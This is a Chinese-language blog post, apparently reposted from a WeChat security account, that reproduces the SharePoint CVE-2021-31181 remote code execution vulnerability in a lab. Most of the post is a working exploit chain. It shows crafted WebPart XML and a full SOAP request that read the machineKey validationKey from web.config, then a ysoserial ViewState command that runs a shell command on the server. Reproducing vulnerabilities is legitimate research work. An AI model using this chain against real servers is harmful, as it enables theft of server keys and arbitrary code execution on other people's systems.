SharePoint CVE-2021-31181 复现

  • A+
所属分类:安全文章

复现

需要一个用户,我这使用的是域管理员账号+SharePoint2016

先要创建team site,在sp2016里是创建网站集,我创建一个名为ts的网站集

http://sharepoint:8080/_admin/createsite.aspx

SharePoint CVE-2021-31181 复现
image.png

然后看poc的xml中

<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%> <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="Documents" WebId="{6e7040c8-0338-4448-914d-a7061e0fc347}">   <DataSources>     <att:xmldatasource runat="server" id="XDS1"       XPath="/configuration/system.web/machineKey"       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config" />   </DataSources>   <xsl>       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">                    <xsl:output method="xml" indent="yes"/>           <xsl:template match="/" >           <xsl:copy-of select="."/>           </xsl:template>       </xsl:stylesheet>   </xsl> </WebPartPages:XsltListFormWebPart>

需要三个参数

1.ListDisplayName2.WebId3.datafile

WebId来自 http://sharepoint/sites/ts/_api/web/id

SharePoint CVE-2021-31181 复现
image.png

e89c64e5-75ce-4bd4-8181-2298228fc91f

ListDisplayName可以新建一个

SharePoint CVE-2021-31181 复现
image.png
SharePoint CVE-2021-31181 复现
image.png

然后ListDisplayName为test

第三个参数datafile是要读取的web.config文件,这个c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config中80对应的端口号,但是有的情况特殊可以试试C:inetpubwwwrootweb.config

比如我搭建的sp,8080管理端口对应的是38040

SharePoint CVE-2021-31181 复现
image.png

然后读web.config,构造的xml

<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%> <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test" WebId="{e89c64e5-75ce-4bd4-8181-2298228fc91f}">   <DataSources>     <att:xmldatasource runat="server" id="XDS1"       XPath="/configuration/system.web/machineKey"       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config" />   </DataSources>   <xsl>       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">                    <xsl:output method="xml" indent="yes"/>           <xsl:template match="/" >           <xsl:copy-of select="."/>           </xsl:template>       </xsl:stylesheet>   </xsl> </WebPartPages:XsltListFormWebPart>

html编码之后http请求

POST /sites/ts/_vti_bin/WebPartPages.asmx HTTP/1.1Host: sharepointContent-Type: text/xml; charset=utf-8Content-Length: 6527SOAPAction: "http://microsoft.com/sharepoint/webpartpages/RenderWebPartForEdit"
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <RenderWebPartForEdit xmlns="http://microsoft.com/sharepoint/webpartpages"> <webPartXml><%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%> <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test" WebId="{e89c64e5-75ce-4bd4-8181-2298228fc91f}"> <DataSources> <att:xmldatasource runat="server" id="XDS1" XPath="/configuration/system.web/machineKey" datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config" /> </DataSources> <xsl> <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="xml" indent="yes"/> <xsl:template match="/" > <xsl:copy-of select="."/> </xsl:template> </xsl:stylesheet> </xsl> </WebPartPages:XsltListFormWebPart></webPartXml> </RenderWebPartForEdit> </soap:Body></soap:Envelope>
SharePoint CVE-2021-31181 复现
image.png

拿到validationKey E8184ADCEE3E6FD39E35B44AC344F88C2581F9F022BF7661F223DBD4EB3F9316

然后ysoserial构造viewstate,查看源代码 http://sharepoint/sites/ts/_layouts/15/success.aspx 拿到 __VIEWSTATEGENERATOR AF878507

SharePoint CVE-2021-31181 复现
image.png

命令

.ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd.exe /c calc" --generator="AF878507" --validationkey="E8184ADCEE3E6FD39E35B44AC344F88C2581F9F022BF7661F223DBD4EB3F9316" --validationalg="HMACSHA256" --islegacy --minify

发包就RCE了

但是我这边用c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config不行,用c:/inetpub/wwwroot/web.config 就可以了。

SharePoint CVE-2021-31181 复现
image.png
SharePoint CVE-2021-31181 复现
image.png

参考

https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability


分享、点赞、看就是对我们的一种支持!

SharePoint CVE-2021-31181 复现

本文始发于微信公众号(ChaBug):SharePoint CVE-2021-31181 复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: